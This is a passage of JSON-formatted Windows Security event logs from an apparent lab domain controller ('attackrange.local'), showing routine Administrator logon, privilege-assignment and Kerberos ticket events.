4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220456,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220457,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x661E0\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x661e0","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220458,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x661E0\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x661e0","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220459,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220460,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220461,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220462,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x664A9\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x664a9","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220463,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x664A9\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x664a9","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220464,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220465,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220466,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{8325D2E2-F565-F530-B8F0-304DFF73B4A1}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220467,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x666E0\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 